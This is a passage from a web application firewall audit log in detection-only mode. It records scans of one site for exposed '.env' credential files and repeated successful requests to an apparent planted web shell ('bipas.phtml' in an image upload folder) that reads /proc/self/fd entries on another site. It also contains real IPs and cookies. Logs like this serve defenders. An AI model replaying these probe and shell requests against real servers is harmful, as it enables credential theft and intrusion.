REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/site/.env"] [unique_id "aFCbwFCTF37l_jAzt4oIjQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113216474858 427757 (- - -) Stopwatch2: 1750113216474858 427757; combined=1870, p1=377, p2=1386, p3=0, p4=0, p5=106, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9628b0a-Z-- --65872727-A-- [17/Jun/2025:04:03:38.311731 +0530] aFCbwaC450Yw050Ymr0b-gAAAAk 198.55.98.236 39530 127.0.0.1 7081 --65872727-B-- GET /.env.dev HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --65872727-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --65872727-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.dev"] [unique_id "aFCbwaC450Yw050Ymr0b-gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113217810503 501294 (- - -) Stopwatch2: 1750113217810503 501294; combined=2555, p1=511, p2=1941, p3=0, p4=0, p5=103, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65872727-Z-- --82b19710-A-- [17/Jun/2025:04:03:39.616921 +0530] aFCbw1JfblPUQiSn5r2HWQAAAAA 198.55.98.236 39540 127.0.0.1 7081 --82b19710-B-- GET /home/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --82b19710-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --82b19710-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/home/.env"] [unique_id "aFCbw1JfblPUQiSn5r2HWQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113219195502 421483 (- - -) Stopwatch2: 1750113219195502 421483; combined=1972, p1=368, p2=1507, p3=0, p4=0, p5=96, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82b19710-Z-- --624d1633-A-- [17/Jun/2025:04:03:40.949575 +0530] aFCbxJVkCcfT-Z8NQYy6mAAAAAc 198.55.98.236 46786 127.0.0.1 7081 --624d1633-B-- GET /web/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --624d1633-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --624d1633-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/web/.env"] [unique_id "aFCbxJVkCcfT-Z8NQYy6mAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113220537052 412587 (- - -) Stopwatch2: 1750113220537052 412587; combined=1682, p1=410, p2=1179, p3=0, p4=0, p5=93, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --624d1633-Z-- --79c65a76-A-- [17/Jun/2025:04:03:42.359787 +0530] aFCbxVJfblPUQiSn5r2HXAAAAAA 198.55.98.236 46966 127.0.0.1 7081 --79c65a76-B-- GET /.env1 HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --79c65a76-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --79c65a76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env1"] [unique_id "aFCbxVJfblPUQiSn5r2HXAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113221861817 498038 (- - -) Stopwatch2: 1750113221861817 498038; combined=152750, p1=371, p2=1187, p3=0, p4=0, p5=75645, sr=105, sw=0, l=0, gc=75547 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79c65a76-Z-- --7622615f-A-- [17/Jun/2025:04:03:43.598809 +0530] aFCbx6C450Yw050Ymr0b_wAAAAk 198.55.98.236 47126 127.0.0.1 7081 --7622615f-B-- GET /website/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 198.55.98.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: none Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --7622615f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --7622615f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/website/.env"] [unique_id "aFCbx6C450Yw050Ymr0b_wAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113223174115 424769 (- - -) Stopwatch2: 1750113223174115 424769; combined=1697, p1=361, p2=1232, p3=0, p4=0, p5=103, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7622615f-Z-- --5fdde87a-A-- [17/Jun/2025:04:04:20.659086 +0530] aFCb7FJfblPUQiSn5r2HcgAAAAA 52.70.138.176 45352 127.0.0.1 7081 --5fdde87a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/62 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.70.138.176 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5fdde87a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --5fdde87a-H-- Message: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/62"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/62"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCb7FJfblPUQiSn5r2HcgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113260655098 4039 (- - -) Stopwatch2: 1750113260655098 4039; combined=2054, p1=328, p2=1615, p3=36, p4=24, p5=51, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5fdde87a-Z-- --39e2ea55-A-- [17/Jun/2025:04:04:32.487964 +0530] aFCb-EcTB7P_sALtclAPUAAAAAI 54.80.185.200 45272 127.0.0.1 7081 --39e2ea55-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/147 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.80.185.200 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --39e2ea55-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --39e2ea55-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/147"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/147"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCb-EcTB7P_sALtclAPUAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113272483188 4829 (- - -) Stopwatch2: 1750113272483188 4829; combined=2378, p1=370, p2=1847, p3=42, p4=60, p5=59, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39e2ea55-Z-- --d3798c22-A-- [17/Jun/2025:04:04:40.496326 +0530] aFCcAArsPejRtmHkrKLWfAAAAAE 100.28.57.133 38760 127.0.0.1 7081 --d3798c22-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/122 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.28.57.133 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --d3798c22-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2955 Connection: close Content-Type: text/html; charset=UTF-8 --d3798c22-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/122"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/122"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcAArsPejRtmHkrKLWfAAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113280492187 4191 (- - -) Stopwatch2: 1750113280492187 4191; combined=2074, p1=330, p2=1645, p3=32, p4=20, p5=47, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d3798c22-Z-- --ad7f152f-A-- [17/Jun/2025:04:05:16.517412 +0530] aFCcJArsPejRtmHkrKLWjgAAAAE 3.81.253.213 38364 127.0.0.1 7081 --ad7f152f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/196 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.81.253.213 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ad7f152f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --ad7f152f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/196"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/196"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcJArsPejRtmHkrKLWjgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113316513219 4257 (- - -) Stopwatch2: 1750113316513219 4257; combined=2105, p1=367, p2=1567, p3=65, p4=33, p5=73, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ad7f152f-Z-- --89387f2f-A-- [17/Jun/2025:04:05:49.220340 +0530] aFCcRVJfblPUQiSn5r2HpwAAAAA 3.227.180.70 37000 127.0.0.1 7081 --89387f2f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/54 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.227.180.70 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --89387f2f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --89387f2f-H-- Message: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/54"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/54"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCcRVJfblPUQiSn5r2HpwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113349216013 4379 (- - -) Stopwatch2: 1750113349216013 4379; combined=2378, p1=395, p2=1864, p3=37, p4=29, p5=53, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89387f2f-Z-- --5e7af61b-A-- [17/Jun/2025:04:06:17.426855 +0530] aFCcYLp3uuKArZI2bI_tJQAAAAg 58.178.15.52 48520 127.0.0.1 7081 --5e7af61b-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 58.178.15.52 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.8060.1271 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=d88a567272f34aef6e149bf7e658afc31750113364; _ga_PETSZCXF5J=GS2.1.s1750113374$o1$g0$t1750113374$j60$l0$h0; _ga=GA1.1.82970895.1750113375; _fbp=fb.1.1750113376127.267336477924658517 --5e7af61b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=1ejoism6hf71sgobb7laapqp2u; expires=Sun, 14 Sep 2025 22:36:17 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --5e7af61b-E-- --5e7af61b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCcYLp3uuKArZI2bI_tJQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCcYLp3uuKArZI2bI_tJQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750113376362690 1064272 (- - -) Stopwatch2: 1750113376362690 1064272; combined=3430, p1=419, p2=2735, p3=111, p4=36, p5=128, sr=133, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750113375" "-" Engine-Mode: "DETECTION_ONLY" --5e7af61b-Z-- --68a5f653-A-- [17/Jun/2025:04:06:32.497555 +0530] aFCccKRT9PYLci8mxb0kDgAAAAM 44.194.139.149 46346 127.0.0.1 7081 --68a5f653-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/16 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.194.139.149 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --68a5f653-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --68a5f653-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/16"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/16"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCccKRT9PYLci8mxb0kDgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750113392492686 4922 (- - -) Stopwatch2: 1750113392492686 4922; combined=2447, p1=373, p2=1946, p3=41, p4=31, p5=56, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68a5f653-Z-- --4df1157e-A-- [17/Jun/2025:04:06:48.506407 +0530] aFCcgBwcFb_n1P0IC9yLrwAAAAo 3.221.222.168 53980 127.0.0.1 7081 --4df1157e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/56 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.221.222.168 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4df1157e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --4df1157e-H-- Message: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/self/fd/56"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file 